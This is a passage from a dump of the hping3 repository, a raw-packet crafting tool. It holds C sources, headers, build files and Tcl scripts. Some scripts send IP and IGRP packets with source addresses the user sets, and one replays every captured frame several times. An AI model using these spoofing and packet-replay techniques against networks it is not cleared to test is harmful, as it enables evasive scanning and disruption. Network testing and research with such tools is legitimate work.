├── KNOWN-BUGS ├── docs ├── HPING3.txt ├── french │ ├── NEWS │ ├── INSTALL │ ├── AS-BACKDOOR │ ├── hping2-fr.8 │ ├── HPING2-IS-OPEN │ ├── hping2-fr.8.txt │ ├── HPING2-HOWTO.txt │ ├── SPOOFED_SCAN.txt │ ├── MORE-FUN-WITH-IPID │ └── Makefile ├── hping2rc.example ├── HPING2-IS-OPEN ├── AS-BACKDOOR ├── MORE-FUN-WITH-IPID ├── APD.txt └── SPOOFED_SCAN.txt ├── img ├── favicon.ico ├── favicon.pnm ├── hping_big.jpg └── hping_icon.jpg ├── .gitignore ├── lib ├── apd.htcl ├── README ├── cloner.htcl ├── raw.htcl ├── apd2.htcl ├── igrp.htcl ├── regtest │ └── rt0.htcl ├── showled.htcl ├── passivets.htcl ├── ping.htcl ├── show-tcpseq.htcl ├── isn-spectrogram.htcl ├── ciscoios0.htcl ├── ciscoios.htcl ├── hpingstdlib.htcl └── nat-noise.htcl ├── CHANGES ├── hex.h ├── hstring.h ├── gentables.sh ├── fixtypes.h ├── sbignum-tables.h ├── apdutils.h ├── BUGS ├── release.h ├── sendrawip.c ├── hcmp.h ├── cksum.c ├── memunlockall.c ├── memlockall.c ├── opensockraw.c ├── memstr.c ├── version.c ├── signal.c ├── memunlock.c ├── memlock.c ├── arsglue.c ├── sockopt.c ├── datahandler.c ├── getusec.c ├── antigetopt.h ├── RFCs ├── INDEX └── rfc768.txt ├── relid.c ├── binding.c ├── gethostname.c ├── sendhcmp.c ├── statistics.c ├── resolve.c ├── if_promisc.c ├── INSTALL ├── adbuf.h ├── AUTHORS ├── byteorder.c ├── in.h ├── NEWS ├── getlhs.c ├── libpcap_stuff.c ├── sendip_handler.c ├── datafiller.c ├── listen.c ├── ip_opt_build.c ├── logicmp.c ├── hstring.c ├── sendudp.c ├── random.c ├── send.c ├── Makefile.in ├── TODO ├── README ├── rtt.c ├── sendtcp.c ├── globals.h ├── strlcpy.c ├── interface.h ├── sendip.c ├── hex.c ├── configure ├── display_ipopt.c ├── gentables.c ├── sbignum.h ├── usage.c ├── apdutils.c ├── antigetopt.c ├── sendicmp.c └── interface.c /KNOWN-BUGS: -------------------------------------------------------------------------------- 1 | See the BUGS manual section. 2 | -------------------------------------------------------------------------------- /docs/HPING3.txt: -------------------------------------------------------------------------------- 1 | Please check wiki.hping.org 2 | -------------------------------------------------------------------------------- /docs/french/NEWS: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/docs/french/NEWS -------------------------------------------------------------------------------- /img/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/img/favicon.ico -------------------------------------------------------------------------------- /img/favicon.pnm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/img/favicon.pnm -------------------------------------------------------------------------------- /img/hping_big.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/img/hping_big.jpg -------------------------------------------------------------------------------- /docs/french/INSTALL: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/docs/french/INSTALL -------------------------------------------------------------------------------- /img/hping_icon.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/img/hping_icon.jpg -------------------------------------------------------------------------------- /docs/french/AS-BACKDOOR: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/docs/french/AS-BACKDOOR -------------------------------------------------------------------------------- /docs/french/hping2-fr.8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/docs/french/hping2-fr.8 -------------------------------------------------------------------------------- /docs/french/HPING2-IS-OPEN: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/docs/french/HPING2-IS-OPEN -------------------------------------------------------------------------------- /docs/french/hping2-fr.8.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/docs/french/hping2-fr.8.txt -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .depend 2 | *.o 3 | hping3 4 | *.swp 5 | Makefile 6 | byteorder 7 | byteorder.h 8 | systype.h 9 | -------------------------------------------------------------------------------- /docs/french/HPING2-HOWTO.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/docs/french/HPING2-HOWTO.txt -------------------------------------------------------------------------------- /docs/french/SPOOFED_SCAN.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/docs/french/SPOOFED_SCAN.txt -------------------------------------------------------------------------------- /docs/french/MORE-FUN-WITH-IPID: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/antirez/hping/HEAD/docs/french/MORE-FUN-WITH-IPID -------------------------------------------------------------------------------- /lib/apd.htcl: -------------------------------------------------------------------------------- 1 | while {1} { 2 | set xx [hping recv -hexdata eth0 0 100] 3 | foreach x $xx { 4 | puts "$x\n" 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /CHANGES: -------------------------------------------------------------------------------- 1 | CHANGES LOG 2 | $Id: CHANGES,v 1.2 2004/03/29 23:12:04 antirez Exp $ 3 | 4 | 30Mar2004 - First public release of hping3 5 | -------------------------------------------------------------------------------- /lib/README: -------------------------------------------------------------------------------- 1 | Note: scripts in this directory are all under the GPL license, if not 2 | otherwise specified in the top comments of the source code. 3 | -------------------------------------------------------------------------------- /hex.h: -------------------------------------------------------------------------------- 1 | #ifndef __HEX_H 2 | #define __HEX_H 3 | 4 | int hextobin(void *dest, char *hexstr, int len); 5 | void bintohex(char *dest, void *bin, int len); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /hstring.h: -------------------------------------------------------------------------------- 1 | #ifndef HPING_HSTRING_H 2 | #define HPING_HSTRING_H 3 | 4 | int strisnum(char *s); 5 | size_t strftok(char *sep, char *str, char **tptrs, size_t nptrs); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /lib/cloner.htcl: -------------------------------------------------------------------------------- 1 | while {1} { 2 | set x [hping recvraw eth0] 3 | hping sendraw [lindex $x 0] 4 | hping sendraw [lindex $x 0] 5 | hping sendraw [lindex $x 0] 6 | hping sendraw [lindex $x 0] 7 | } 8 | -------------------------------------------------------------------------------- /lib/raw.htcl: -------------------------------------------------------------------------------- 1 | while {1} { 2 | set packets [hping recvraw eth0 -1 1] 3 | foreach p $packets { 4 | set len [string bytelength $p] 5 | binary scan $p H* hex 6 | puts "$len: $hex\n" 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /gentables.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | CC=${CC:=cc} 4 | CCOPT="-Wall -W -O2" 5 | 6 | $CC gentables.c -o gentables $CCOPT 7 | ./gentables > tables.c 8 | ./gentables h > tables.h 9 | echo Tables generated 10 | -------------------------------------------------------------------------------- /lib/apd2.htcl: -------------------------------------------------------------------------------- 1 | source "hpingstdlib.htcl" 2 | 3 | proc recv {} { 4 | set xx [hping recv -hexdata eth0 0 100] 5 | foreach x $xx { 6 | if {[GetIpDaddr $x] == "192.168.1.20"} { 7 | puts "$x\n" 8 | } 9 | } 10 | after 10 recv 11 | } 12 | 13 | after 10 recv 14 | vwait forever 15 | -------------------------------------------------------------------------------- /lib/igrp.htcl: -------------------------------------------------------------------------------- 1 | #hping send "ip(saddr=192.168.41.183,daddr=255.255.255.255,ttl=255)+igrp(opcode=update,edition=[expr 114+$i],autosys=1,interior=1,system=0,exterior=0)+igrp.entry(dest=$i.7.6)" 2 | 3 | hping send "ip(saddr=192.168.41.183,daddr=192.168.41.184,ttl=255)+igrp(opcode=request,edition=100,autosys=1,interior=0,system=0,exterior=0)" 4 | -------------------------------------------------------------------------------- /fixtypes.h: -------------------------------------------------------------------------------- 1 | #ifndef HPING3_FIXTYPES_H 2 | #define HPING3_FIXTYPES_H 3 | 4 | #ifdef __sun__ 5 | typedef char int_8_t; 6 | typedef unsigned char u_int8_t; 7 | typedef short int_16_t; 8 | typedef unsigned short u_int16_t; 9 | typedef int int_32_t; 10 | typedef unsigned int u_int32_t; 11 | #endif 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /docs/french/Makefile: -------------------------------------------------------------------------------- 1 | TXT = hping2-fr.8.txt 2 | 3 | all: $(TXT) 4 | 5 | hping2-fr.8.txt: hping2-fr.8 6 | #groff -t -e -mandoc -Tlatin1 hping2-fr.8 | col -bx | uniq > hping2-fr.8.txt 7 | #groff -t -e -mandoc -Tlatin1 hping2-fr.8 | uniq > hping2-fr.8.txt 8 | groff -t -e -mandoc -Tlatin1 hping2-fr.8 | LC_ALL=fr_FR.ISO-8859-1 col -bx | uniq > hping2-fr.8.txt 9 | 10 | clean: 11 | rm -f *~ $(TXT) 12 | -------------------------------------------------------------------------------- /sbignum-tables.h: -------------------------------------------------------------------------------- 1 | #ifndef _SBN_TABLES_H 2 | #define _SBN_TABLES_H 3 | 4 | #include 5 | 6 | extern char *cset; 7 | extern int8_t r_cset[256]; 8 | extern int8_t bitstable[256]; 9 | extern double basetable[37]; 10 | struct sbn_basepow { 11 | unsigned long maxpow; 12 | unsigned long maxexp; 13 | }; 14 | extern struct sbn_basepow basepowtable[37]; 15 | 16 | #endif /* _SBN_TABLES_H */ 17 | -------------------------------------------------------------------------------- /apdutils.h: -------------------------------------------------------------------------------- 1 | #ifndef __APD_UTILS_H 2 | #define __APD_UTILS_H 3 | 4 | int ars_d_firstfield_off(char *packet, char *layer, char *field, 5 | int *field_start, int *value_start, int *value_end); 6 | int ars_d_field_off(char *packet, char *layer, char *field, int skip, 7 | int *field_start, int *value_start, int *value_end); 8 | char *ars_d_field_get(char *packet, char *layer, char *field, int skip); 9 | 10 | #endif 11 | -------------------------------------------------------------------------------- /BUGS: -------------------------------------------------------------------------------- 1 | ------------------------------------------------ 2 | Please, use this procedure to report hping3 bugs 3 | ------------------------------------------------ 4 | 5 | - If you are able to use a Wiki: 6 | 7 | Go to http://wiki.hping.org/20 and use the 'edit' button to 8 | add your bug report. 9 | 10 | - If you can't use the Wiki: 11 | 12 | Follow the istructions at wiki.hping.org/20 but instead to add 13 | the bug report in the hping web site, write me an email. 14 | -------------------------------------------------------------------------------- /docs/hping2rc.example: -------------------------------------------------------------------------------- 1 | # Example hping2rc adding support for readline 2 | 3 | catch {package require tclreadline} 4 | if {[catch {package present tclreadline} x]} { 5 | puts $x 6 | set has_readline 0 7 | } else { 8 | set has_readline 1 9 | } 10 | if {$tcl_interactive && $has_readline} { 11 | package require tclreadline 12 | proc ::tclreadline::prompt1 {} { 13 | global hping_version 14 | return "hping$hping_version\> " 15 | } 16 | tclreadline::Loop 17 | } 18 | -------------------------------------------------------------------------------- /release.h: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: release.h$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 16 11:55:49 MET 1999$ 8 | * $rev: 17$ 9 | */ 10 | 11 | #ifndef _RELEASE_H 12 | #define _RELEASE_H 13 | 14 | #define RELEASE_VERSION "3.0.0-alpha-1" 15 | #define RELEASE_DATE "$Id: release.h,v 1.4 2004/04/09 23:38:56 antirez Exp $" 16 | #define CONTACTS "" 17 | 18 | #endif /* _RELEASE_H */ 19 | -------------------------------------------------------------------------------- /sendrawip.c: -------------------------------------------------------------------------------- 1 | /* $Id: sendrawip.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #include "hping2.h" 12 | #include "globals.h" 13 | 14 | void send_rawip(void) 15 | { 16 | char *packet; 17 | 18 | packet = malloc(data_size); 19 | if (packet == NULL) { 20 | perror("[send_rawip] malloc()"); 21 | return; 22 | } 23 | memset(packet, 0, data_size); 24 | data_handler(packet, data_size); 25 | send_ip_handler(packet, data_size); 26 | free(packet); 27 | } 28 | -------------------------------------------------------------------------------- /hcmp.h: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: hcmp.h$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 9$ 9 | */ 10 | 11 | /* Hping Control Message Protocol */ 12 | 13 | #define HCMP_RESTART 1 14 | #define HCMP_SOURCE_QUENCH 2 15 | #define HCMP_SOURCE_STIRUP 3 16 | #define HCMP_CHPROTO 4 /* still unused */ 17 | 18 | struct hcmphdr 19 | { 20 | __u8 type; 21 | union 22 | { 23 | __u16 seqnum; 24 | __u32 usec; 25 | } typedep; 26 | }; 27 | -------------------------------------------------------------------------------- /cksum.c: -------------------------------------------------------------------------------- 1 | /* $Id: cksum.c,v 1.3 2004/04/14 12:30:18 antirez Exp $ */ 2 | 3 | #include "hping2.h" /* only for arch semi-indipendent data types */ 4 | #include "globals.h" 5 | 6 | /* 7 | * from R. Stevens's Network Programming 8 | */ 9 | __u16 cksum(__u16 *buf, int nbytes) 10 | { 11 | __u32 sum; 12 | 13 | sum = 0; 14 | while (nbytes > 1) { 15 | sum += *buf++; 16 | nbytes -= 2; 17 | } 18 | 19 | if (nbytes == 1) { 20 | sum += *((__u8*)buf); 21 | } 22 | 23 | sum = (sum >> 16) + (sum & 0xffff); 24 | sum += (sum >> 16); 25 | 26 | /* return a bad checksum with --badcksum option */ 27 | if (opt_badcksum) sum ^= 0x5555; 28 | 29 | return (__u16) ~sum; 30 | } 31 | -------------------------------------------------------------------------------- /memunlockall.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memunlockall.c$ 4 | * $other_author: Alfonso De Gregorio 5 | * $other_copyright: Copyright (C) 1999 by Alfonso De Gregorio 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: memunlockall.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | int memunlockall(void) 17 | { 18 | /* #ifdef _POSIX_MEMLOCK */ 19 | /* NJ: better to test _POSIX_MEMLOCK value */ 20 | #if _POSIX_MEMLOCK == 1 21 | return ( munlockall() ); 22 | #endif 23 | return(-1); 24 | } 25 | 26 | -------------------------------------------------------------------------------- /memlockall.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memlockall.c$ 4 | * $other_author: Alfonso De Gregorio 5 | * $other_copyright: Copyright (C) 1999 by Alfonso De Gregorio 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: memlockall.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | int memlockall(void) 17 | { 18 | /* #ifdef _POSIX_MEMLOCK */ 19 | /* NJ: better to test _POSIX_MEMLOCK value */ 20 | #if _POSIX_MEMLOCK == 1 21 | return ( mlockall(MCL_CURRENT|MCL_FUTURE) ); 22 | #endif 23 | return (-1); 24 | } 25 | 26 | -------------------------------------------------------------------------------- /opensockraw.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: opensockraw.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: opensockraw.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include /* IPPROTO_RAW def. */ 17 | 18 | int open_sockraw() 19 | { 20 | int s; 21 | 22 | s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); 23 | if (s == -1) { 24 | perror("[open_sockraw] socket()"); 25 | return -1; 26 | } 27 | 28 | return s; 29 | } 30 | -------------------------------------------------------------------------------- /memstr.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memstr.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 4$ 9 | */ 10 | 11 | /* $Id: memstr.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include /* NULL macro */ 15 | 16 | char *memstr(char *haystack, char *needle, int size) 17 | { 18 | char *p; 19 | char needlesize = strlen(needle); 20 | 21 | for (p = haystack; p <= (haystack-needlesize+size); p++) 22 | { 23 | if (memcmp(p, needle, needlesize) == 0) 24 | return p; /* found */ 25 | } 26 | return NULL; 27 | } 28 | -------------------------------------------------------------------------------- /docs/HPING2-IS-OPEN: -------------------------------------------------------------------------------- 1 | I want to spend two words about hping2 developing model. 2 | Hping2 is totally open to new contribution and ideas, 3 | if you have even the littlest idea in order to make 4 | hping better or you make some patch send me an email. 5 | All the patches, if they don't break the old code and 6 | are not totally useless, will be included. I know of 7 | a lot of projects that are GPLed but in some way "close" 8 | since every new patch is considered bloat or the only 9 | possible code is the primary authors code: THIS IS 10 | NOT THE CASE! Also every the littlest doc contribution 11 | will be added to hping2, you can just build a plain-text 12 | file that exposes how to do some task with hping, it will 13 | be included under the 'docs' directory. 14 | 15 | antirez 16 | -------------------------------------------------------------------------------- /version.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: version.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:50 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: version.c,v 1.3 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | #include "release.h" 17 | #include "hping2.h" 18 | 19 | void show_version(void) 20 | { 21 | printf("hping version %s (%s)\n", RELEASE_VERSION, RELEASE_DATE); 22 | #ifdef USE_TCL 23 | printf("This binary is TCL scripting capable\n"); 24 | #else 25 | printf("NO TCL scripting support compiled in\n"); 26 | #endif 27 | exit(0); 28 | } 29 | 30 | -------------------------------------------------------------------------------- /signal.c: -------------------------------------------------------------------------------- 1 | /* protable signal() like */ 2 | 3 | /* $Id: signal.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 4 | 5 | #include 6 | 7 | /* Portable signal() from R.Stevens, 8 | * modified to reset the handler */ 9 | void (*Signal(int signo, void (*func)(int)))(int) 10 | { 11 | struct sigaction act, oact; 12 | 13 | act.sa_handler = func; 14 | sigemptyset(&act.sa_mask); 15 | act.sa_flags = 0; /* So if set SA_RESETHAND is cleared */ 16 | if (signo == SIGALRM) 17 | { 18 | #ifdef SA_INTERRUPT 19 | act.sa_flags |= SA_INTERRUPT; /* SunOS 4.x */ 20 | #endif 21 | } 22 | else 23 | { 24 | #ifdef SA_RESTART 25 | act.sa_flags |= SA_RESTART; /* SVR4, 4.4BSD, Linux */ 26 | #endif 27 | } 28 | if (sigaction(signo, &act, &oact) == -1) 29 | return SIG_ERR; 30 | return (oact.sa_handler); 31 | } 32 | -------------------------------------------------------------------------------- /memunlock.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memunlock.c$ 4 | * $other_author: Alfonso De Gregorio 5 | * $other_copyright: Copyright (C) 1999 by Alfonso De Gregorio 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: memunlock.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | int memunlock(char *addr, size_t size) 17 | { 18 | #ifdef _POSIX_MEMLOCK_RANGE 19 | unsigned long page_offset, page_size; 20 | 21 | page_size = sysconf(_SC_PAGESIZE); 22 | page_offset = (unsigned long) addr % page_size; 23 | 24 | addr -= page_offset; 25 | size += page_offset; 26 | 27 | return ( munlock(addr, size) ); 28 | #endif 29 | return (-1); 30 | } 31 | -------------------------------------------------------------------------------- /memlock.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memlock.c$ 4 | * $other_author: Alfonso De Gregorio 5 | * $other_copyright: Copyright (C) 1999 by Alfonso De Gregorio 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: memlock.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | int memlock(char *addr, size_t size) 17 | { 18 | #ifdef _POSIX_MEMLOCK_RANGE 19 | unsigned long page_offset, page_size; 20 | 21 | page_size = sysconf(_SC_PAGESIZE); /* also .. */ 22 | page_offset = (unsigned long) addr % page_size; 23 | 24 | addr -= page_offset; 25 | size += page_offset; 26 | 27 | return ( mlock(addr, size) ); 28 | #endif 29 | return (-1); 30 | } 31 | 32 | -------------------------------------------------------------------------------- /arsglue.c: -------------------------------------------------------------------------------- 1 | /* Glue between hping and the ars engine */ 2 | 3 | /* $Id: arsglue.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 4 | 5 | #include 6 | #include 7 | #include "ars.h" 8 | 9 | /* Send the APD described packet {s} */ 10 | void hping_ars_send(char *apd) 11 | { 12 | struct ars_packet p; 13 | int s; 14 | 15 | ars_init(&p); 16 | s = ars_open_rawsocket(&p); 17 | if (s == -ARS_ERROR) { 18 | perror("Opening raw socket"); 19 | exit(1); 20 | } 21 | if (ars_d_build(&p, apd) != -ARS_OK) { 22 | fprintf(stderr, "APD error: %s\n", p.p_error); 23 | exit(1); 24 | } 25 | if (ars_compile(&p) != -ARS_OK) { 26 | fprintf(stderr, "APD error compiling: %s\n", p.p_error); 27 | exit(1); 28 | } 29 | if (ars_send(s, &p, NULL, 0) != -ARS_OK) { 30 | perror("Sending the packet"); 31 | exit(1); 32 | } 33 | exit(0); 34 | } 35 | -------------------------------------------------------------------------------- /lib/regtest/rt0.htcl: -------------------------------------------------------------------------------- 1 | # SIGSEGV due to ipopt compilation bug: the padding code didn't set realloc() 2 | # result in layer->l_data field. Fixed. 3 | 4 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.nop+ip.nop+ip.sec+icmp} 5 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.nop+ip.nop+ip.sec+ip.eol+icmp} 6 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.nop+ip.nop+ip.sec+ip.eol+icmp} 7 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.sec+ip.eol+icmp} 8 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.eol+icmp} 9 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.nop+ip.eol+icmp} 10 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.nop+ip.eol+ip.nop+ip.eol+icmp} 11 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.nop+ip.eol+ip.nop+ip.eol+ip.ts+icmp} 12 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.nop+ip.nop+ip.sec+icmp} 13 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.sec+ip.nop+ip.eol+ip.nop+ip.eol+ip.sec+icmp} 14 | -------------------------------------------------------------------------------- /sockopt.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sockopt.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: sockopt.c,v 1.3 2003/09/07 11:21:18 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include /* IP_PROTOIP */ 16 | #include 17 | 18 | void socket_broadcast(int sd) 19 | { 20 | const int one = 1; 21 | 22 | if (setsockopt(sd, SOL_SOCKET, SO_BROADCAST, 23 | (char *)&one, sizeof(one)) == -1) 24 | { 25 | printf("[socket_broadcast] can't set SO_BROADCAST option\n"); 26 | /* non fatal error */ 27 | } 28 | } 29 | 30 | void socket_iphdrincl(int sd) 31 | { 32 | const int one = 1; 33 | 34 | if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, 35 | (char *)&one, sizeof(one)) == -1) 36 | { 37 | printf("[socket_iphdrincl] can't set IP_HDRINCL option\n"); 38 | /* non fatal error */ 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /datahandler.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: datahandler.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: datahandler.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | 15 | #include "hping2.h" 16 | #include "globals.h" 17 | 18 | void data_handler(char *data, int data_size) 19 | { 20 | if (opt_listenmode) { /* send an HCMP */ 21 | memcpy(data, rsign, signlen); /* ok, write own reverse sign */ 22 | data+=signlen; 23 | data_size-=signlen; 24 | memcpy(data, hcmphdr_p, data_size); 25 | return; /* done */ 26 | } 27 | 28 | if (opt_sign) { 29 | memcpy(data, sign, signlen); /* lenght pre-checked */ 30 | data+=signlen; 31 | data_size-=signlen; 32 | } 33 | 34 | if (data_size == 0) 35 | return; /* there is not space left */ 36 | 37 | if (opt_datafromfile) 38 | datafiller(data, data_size); 39 | else 40 | memset(data, 'X', data_size); 41 | } 42 | -------------------------------------------------------------------------------- /lib/showled.htcl: -------------------------------------------------------------------------------- 1 | package require Tk 2 | 3 | set bgcolor {#FFFFFF} 4 | 5 | wm title . {hping3 -- showled} 6 | 7 | set w .main 8 | 9 | frame $w 10 | pack $w -side top 11 | . config -background $bgcolor 12 | $w config -background $bgcolor 13 | 14 | # canvas 15 | set ifnum [llength [hping iflist]] 16 | canvas $w.can -width 100 -height [expr ($ifnum*25)+40] 17 | $w.can config -background $bgcolor 18 | pack $w.can -fill both -expand true 19 | 20 | # show leds 21 | proc draw {} { 22 | global w 23 | 24 | set ifnum [llength [hping iflist]] 25 | $w.can config -width 100 -height [expr ($ifnum*25)+40] 26 | $w.can delete all 27 | set y 20 28 | foreach i [hping iflist] { 29 | set ifname [lindex $i 0] 30 | if {[string match *NOLINK* [lindex $i 4]]} { 31 | set color red 32 | } else { 33 | set color green 34 | } 35 | $w.can create oval 20 $y 40 [expr $y+20] -fill $color -width 1 -outline black -tag $ifname 36 | $w.can create text 60 [expr $y+10] -text $ifname -tag $ifname.t 37 | incr y 25 38 | } 39 | after 1000 draw 40 | } 41 | 42 | after 0 draw 43 | 44 | #vim: set filetype=tcl softtabstop=4 45 | -------------------------------------------------------------------------------- /getusec.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: getusec.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: getusec.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | time_t get_usec(void) 17 | { 18 | struct timeval tmptv; 19 | 20 | gettimeofday(&tmptv, NULL); 21 | return tmptv.tv_usec; 22 | } 23 | 24 | time_t milliseconds(void) 25 | { 26 | struct timeval tv; 27 | gettimeofday(&tv, NULL); 28 | return ((tv.tv_sec % 86400) * 1000 + tv.tv_usec / 1000); 29 | } 30 | 31 | /* This function returns milliseconds since 1 Jan 1970, 32 | * so it's like time() but with milliseconds resolution. 33 | * We use this function mainly for physical fingerpriting 34 | * via TCP timestamp. */ 35 | long long mstime(void) 36 | { 37 | struct timeval tmptv; 38 | 39 | gettimeofday(&tmptv, NULL); 40 | return ((long long)tmptv.tv_sec*1000)+(tmptv.tv_usec/1000); 41 | } 42 | -------------------------------------------------------------------------------- /antigetopt.h: -------------------------------------------------------------------------------- 1 | #ifndef __ANTIGETOPT_H 2 | #define __ANTIGETOPT_H 3 | 4 | /* special return codes */ 5 | enum { AGO_EOF=4000, AGO_ALONE, AGO_UNKNOWN, AGO_REQARG, AGO_RESET, AGO_AMBIG }; 6 | 7 | /* option flags */ 8 | #define AGO_NOARG (1<<0) /* no argument */ 9 | #define AGO_NEEDARG (1<<1) /* required argument */ 10 | #define AGO_OPTARG (1<<2) /* optional argument */ 11 | #define AGO_EXCEPT0 (1<<3) /* exception #0 */ 12 | #define AGO_EXCEPT1 (1<<4) /* exception #1 */ 13 | #define AGO_EXCEPT2 (1<<5) /* exception #3 */ 14 | #define AGO_ENDOFLIST (1<<15) /* end of argument list marker */ 15 | 16 | /* option list null term */ 17 | #define 